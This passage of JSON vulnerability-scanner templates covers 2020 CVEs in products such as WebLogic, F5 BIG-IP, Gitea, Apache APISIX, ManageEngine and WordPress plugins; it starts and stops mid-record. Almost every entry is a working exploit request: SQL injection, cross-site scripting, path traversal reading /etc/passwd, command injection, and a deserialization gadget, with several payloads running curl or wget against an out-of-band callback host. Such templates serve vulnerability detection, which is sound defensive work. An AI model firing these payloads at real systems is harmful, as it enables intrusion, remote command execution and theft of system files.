Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-10189","info":{"name":"ManageEngine Desktop Central Java Deserialization","severity":"critical"},"requests":[{"raw":["POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{generate_java_gadget(\"commons-collections3.1\",\"wget http://{{interactsh-url}}\",\"raw\")}}\n"],"matchers":[{"type":"status","status":[200],"internal":true}]},{"raw":["GET /cewolf/?img=%5Clogger.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ultimate FAQ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-12256","info":{"name":"rConfig 3.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /devicemgmt.php?deviceId=\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\") && contains(body_3, \"rConfig - Configuration Management\")","contains(content_type_3, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-12124","info":{"name":"WAVLINK WN530H4 live_api.cgi - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"word","part":"body","words":["WiFiBand"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": \"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/canto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Canto","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-2733","info":{"name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-35489","info":{"name":"WordPress Contact Form 7 - Unrestricted File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.3.2')"]},{"type":"word","part":"body","words":["Contact Form 7","== Changelog =="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 5.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/eventON/"]}]},{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 